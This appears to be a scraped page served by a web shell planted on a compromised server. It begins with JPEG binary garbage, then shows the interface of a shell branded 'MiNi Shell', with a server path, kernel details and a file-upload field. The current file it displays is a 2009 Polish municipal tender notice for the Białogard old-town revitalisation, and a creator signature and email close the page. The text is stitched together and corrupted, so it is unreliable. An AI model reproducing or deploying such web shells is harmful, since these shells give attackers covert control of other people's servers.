JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090304/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090304/45473-N-2009.html

<p class="kh_header"><b>Białogard: Rewitalizacja Starego Miasta w Białogardzie - Etap II</b><br>
<b>Numer ogłoszenia: 45473 - 2009; data zamieszczenia: 04.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Białogard - Urząd Miasta Białogardu , ul. 1-go Maja 18, 78-200 Białogard, woj. zachodniopomorskie, tel. 094 3122310, faks 094 3122919.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bialogard.info</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rewitalizacja Starego Miasta w Białogardzie - Etap II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane związane z odrestaurowaniem i rewitalizacją zabytkowej części miasta Białogard.
Projekt przewiduje:
- odtworzenie zabytkowego układu urbanistycznego w najstarszej części miasta poprzez wykonanie remontu dachów, ocieplenia i kolorystyki łącznie w 29 budynkach o walorach historyczno-architektonicznych, zlokalizowanych w obrębie białogardzkiego Starego Miasta, przy ulicach: Najświętszej Marii Panny (11 budynków), Staromiejskiej (5 budynków), Grottgera (2 budynki), Lindego (3 budynki), Kopernika (5 budynków), Rycerskiej (2 budynki), Matejki (1 budynek);
- dopasowanie wyglądu zewnętrznego dróg i ciągów pieszych do zabytkowego charakteru tej części miasta (ul. Matejki, Najświętszej Marii Panny, Kościelna, Kopernika, Lindego, Reymonta, Rycerska, Siemiradzkiego oraz Staromiejska).
Wszystkie projekty techniczne związane z realizacją zadania zyskały pozytywną opinię Wojewódzkiego Konserwatora Zabytków. 
1.Zakres prac na podstawie dokumentacji projektowej przedstawia się następująco:
a)Renowacja elewacji 29 budynków 
- ul. Najświętszej Marii Panny (11 budynków - nr 3,4,5,6,7,11,12,13,14,21,22),
- ul. Staromiejska (5 budynków - nr 5,6-7,8,9-12-14/15,16),
- ul. Grottgera (2 budynki - nr 16,17),
- ul. Lindego (3 budynki - nr 5-6,8-9,19),
- ul. Kopernika (5 budynków - nr 3-4,5,8,10,11),
- ul. Rycerska (2 budynki - nr 2,11),
- ul. Matejki (1 budynek - nr 1).
b)	Renowacja dachów 29 budynków
- ul. Najświętszej Marii Panny (11 budynków - nr 3,4,5,6,7,11,12,13,14,21,22),
- ul. Staromiejska (5 budynków - nr 5,6-7,8,9-12-14/15,16),
- ul. Grottgera (2 budynki - nr 16,17),
- ul. Lindego (3 budynki - nr 5-6,8-9,19),
- ul. Kopernika (5 budynków - nr 3-4,5,8,10,11),
- ul. Rycerska (2 budynki - nr 2,11),
- ul. Matejki (1 budynek - nr 1).
c)Renowacja dróg i ciągów pieszych o dł. około 13 500 m2- (ul. Matejki, Najświętszej Marii Panny, Kościelna, Kopernika, Lindego, Reymonta, Rycerska, Siemiradzkiego oraz Staromiejska).
- roboty przygotowawcze, rozbiórkowe i ziemne,
- roboty krawężnikowe, roboty nawierzchniowe.
Ponadto Wykonawca będzie zobowiązany do wykonania:
1.dokumentacji powykonawczej (w tym mapy geodezyjne-powykonawcze),
2.kosztorysu ofertowego na podstawie przedmiaru robót dołączonego do SIWZ.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.45.30.00-7, 45.21.23.50-4, 45.26.00.00-7, 45.23.31.40-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.06.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Na etapie składania ofert Zamawiający będzie wymagał wniesienia wadium w wysokości 150.000 zł.
(do wniesienia wadium zobowiązani będą jedynie Wykonawcy zaproszeni do składania ofert). 
Wadium należy wnieść w jednej z następujących form:
a) pieniądzu przelewem na rachunek bankowy Zamawiającego w PeKaO S.A. Białogard Nr 36124036661111000043446782,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie. kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).
2) Potwierdzenie dokonania przelewu (dotyczy wadium wniesionego w pieniądzu), wystawione przez Bank opisane WADIUM PRZETARGOWE oraz wadium wniesione w innej postaci niż w pieniądzu, wymienionej w pkt. 1) lit b) do e) w postaci oryginału, obejmujące okres związania Wykonawcy ofertą (30 dni) należy załączyć do oferty Zamawiający wyklucza wadium w innej postaci niż określono wyżej.
3) Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
4) Oferty nie zabezpieczone wadium przetargowym będą traktowane jako nie spełniające wymagań specyfikacji istotnych warunków zamówienia i na tej podstawie zostaną odrzucone.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1) Do postępowania zostanie zakwalifikowanych 5 Wykonawców spełniających warunki udziału w postępowaniu. Jeżeli liczba wniosków spełniających warunki udziału w postępowaniu będzie większa od 5 to wnioski następne, które będą posiadały taką sama ilość punktów co wniosek nr 5, również zostaną zakwalifikowane do postępowania. 

2) Ocena wniosków polegać będzie na przyznaniu punktów za każde wymienione 
w Wykazie zrealizowanych robót budowlanych zadanie, według następujących zasad: 
- Zamawiający przyzna punkty za zysk netto w każdym roku za okres 5 lat tj. 2003-2007 jak niżej:
				zysk			strata
do 500 tys. zł.			10 pkt.			- 10 pkt.	
500 tys. zł. - 700 tys. zł.		20 pkt.			- 20 pkt
700 tys. zł. - 1 mln zł.		30 pkt.			- 30 pkt.
1 mln zł. - 1,5 mln zł.		40 pkt.			- 40 pkt
1,5 mln zł. - 2 mln zł.		50 pkt.			- 50 pkt.
powyżej 2 mln			60 pkt.			- 60 pkt

Jeżeli Wykonawca będzie miał stratę, to punkty będą przyznawane jak za zysk tylko ujemnie.

Przykład: 		zysk 1.200 tys. zł. za 1 rok
					punkty:
					1 mln. zł. - 1,5 mln. zł	40 pkt.

Jeżeli wniosek o dopuszczenie do udziału w postępowaniu przetargowym będzie składało Konsorcjum do punktacji będzie brany zysk wspólnie.

- Zamawiający za każdą wykonaną robotę budowlaną w latach 2003-2007 przyzna  
następujące punkty:
od 1 - 3 mln zł. 		5 pkt.
od 3 - 5 mln. zł. 		10 pkt.
powyżej 5 mln. zł. 	            15 pkt.

Wykonane prace muszą być potwierdzone pisemnymi referencjami, które będą zawierać okres wykonywanych robót.

O końcowym wyniku będzie decydować największa ilość punktów.
O zakwalifikowaniu do postępowania decyduje kolejno uzyskana największa ilość punktów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy złożą wniosek 
  o dopuszczenie do udziału w przetargu ograniczonym oraz złożą oświadczenia 
  o spełnieniu  następujących warunków:
a) określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień 
publicznych (Dz.U. Nr 223, poz. 1655 z późn. zm.);
nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i ust. 2 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz.U. Nr 223, poz. 1655 z późn. zm.);
b)w przypadku Wykonawców wspólnie ubiegających się o zamówienie żaden z nich 
nie może podlegać wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych, oraz warunki określone w art. 22 ust. 1 w/w ustawy musi spełniać przynajmniej jeden z Wykonawców lub wszyscy wykonawcy łącznie;
c)aktualny odpis z właściwego rejestru handlowego lub zaświadczenie o wpisie do   
ewidencji działalności gospodarczej wystawione z datą nie wcześniejszą niż 6 miesięcy przed upływem terminu składania wniosków;
d) aktualna informacja z Krajowego Rejestru Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego w zakresie określonym w art. 24 ust. 1 pkt. 4-8 i art. 24 ust. 1 pkt 9 ustawy Prawo zamówień publicznych, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków.
e) zaświadczenie z właściwego Urzędu Skarbowego potwierdzające, że Oferent nie zalega z opłacaniem podatków i opłat lub zaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego. Zaświadczenie wystawione z datą nie wcześniejszą niż 3 miesiące przed upływem terminu składania wniosków;   
f) zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy 
Rolniczego Ubezpieczenia Społecznego potwierdzające, że Oferent nie zalega        z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego. Zaświadczenie wystawione z datą nie wcześniejszą niż 3 miesiące przed upływem terminu składania wniosków;
g) oświadczenie, że Wykonawca w przypadku wygrania postępowania ubezpieczy plac budowy na czas realizacji umowy na kwotę nie mniejszą niż 1 mln PLN.
h)polisę ubezpieczeniową, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
i) jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium
Rzeczypospolitej Polskiej zamiast dokumentów wymienionych w pkt. 1) w ppkt. od c do f  składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę potwierdzające odpowiednio, że: -  nie otwarto jego likwidacji ani nie ogłoszono upadłości (dokument wystawiony nie wcześniej niż 6 miesiące przez upływem terminu składani wniosków o dopuszczenie do udziału w postępowaniu),
-  nie orzeczono wobec niego zakazu ubiegania się o zamówienie publiczne (dokument wystawiony nie wcześniej niż 6 miesiące przez upływem terminu składani wniosków o dopuszczenie do udziału w postępowaniu),
- nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne 
lub zdrowotne (dokumenty wystawione nie wcześniej niż 3 miesiące przez upływem terminu składani wniosków o dopuszczenie do udziału w postępowaniu).
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę 
lub miejsce zamieszkania.
Terminy ważności dokumentów nie ulegają zmianie.   
W przypadku dokumentu wymienionego w pkt 1) w ppkt d Wykonawca składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Pzp.  
Zgodnie z art. 23 ust. 1-3 ustawy Prawo zamówień publicznych (Dz.U. z 2007 r. Nr 223, poz. 1655 z późn. zm.) w przypadku wykonawców wspólnie ubiegających się o zamówienie dokumenty o których mowa w pkt. 1) w ppkt. od b do f  oraz oświadczenie z art. 24 ust. 1 i 2 w/w ustawy składa każdy z osobna. Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego - załączyć pełnomocnictwo.

Jeżeli oferta wykonawców, o których mowa w art. 23 ust. 1 ustawy Prawo zamówień publicznych  zostanie wybrana Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych wykonawców (art. 23 ust. 4 ustawy Prawo zamówień publicznych Dz.U. z 2007 r. Nr 223, poz. 1655 zpóźn. zm.).

Zgodnie z art. 36 ust. 5 ustawy Prawo zamówień publicznych (Dz.U. z 2007 r. Nr 223, poz. 1655 z późn. zm.) zamawiający dopuszcza powierzenie przez Wykonawcę wykonania przedmiotu zamówienia podwykonawcom w wysokości do 80% wartości zamówienia. 

2) Wiedza i doświadczenie oraz potencjał techniczny i osobowy
a)wykaz zrealizowanych robót w okresie ostatnich 5 lat (min. 2 roboty o wartości nie mniejszej niż 5 mln. zł. [brutto] + potwierdzenia w tym 1 roboty wykonywanej 
pod nadzorem Konserwatora Zabytków + potwierdzenie i 1 roboty z zakresu    
drogownictwa o wartości nie mniejszej niż 500 000 zł. [brutto] + potwierdzenia)   
przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli 
okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania, a także z załączeniem dokumentów potwierdzających, że prace te zostały wykonane z należytą starannością. Na wykazie przy wymienionym zadaniu należy wpisać numer strony referencji wraz z ich załączeniem - druk do wypełnienia;
b)wykaz pracowników z podaniem ich kwalifikacji - minimum 3 pracowników nadzoru technicznego posiadających uprawnienia do wykonywania samodzielnych funkcji 
w specjalności ogólnobudowlanej (2 pracowników) i drogowej (1 pracownik) (należy załączyć uprawnienia i zaświadczenia o członkostwie w Izbie Samorządu Zawodowego oraz opłaceniu składek - pracowników nadzoru) - druk do wypełnienia; 
c)wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakie posiada 
wykonawca  - druk do wypełnienia;

3. Sytuacja ekonomiczna i finansowa
a)o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą się rocznym obrotem w zakresie robót budowlanych w 2007 r. w wysokości 10 mln. zł.;
b)informację, że posiadają środki własne lub zdolność kredytową na kwotę 
2 mln. zł., wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia publicznego;
c)Wykonawca złoży wraz z wnioskiem informację z banku lub spółdzielczej kasy       
oszczędnościowo-kredytowej, w których posiada rachunek, potwierdzającą wysokość posiadanych środków lub zdolność kredytową Wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed terminem składania wniosków;
d)bilans oraz rachunek zysków i strat za lata 2003-2007;.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p><br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.bialogard.info w dziale Zamówienia publiczne.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Białogard, ul. 1 Maja 18, 78-200 Białogard, pokój 216 w godz. 7.00 - 15..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2009 godzina 10:00, miejsce: Urząd Miasta Białogard, ul. 1 Maja 18, 78-200 Białogard pokój 224 - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Rewitalizacja Starego Miasta w Białogardzie - Etap II  dofinansowany

Creat By MiNi SheLL
Email: jattceo@gmail.com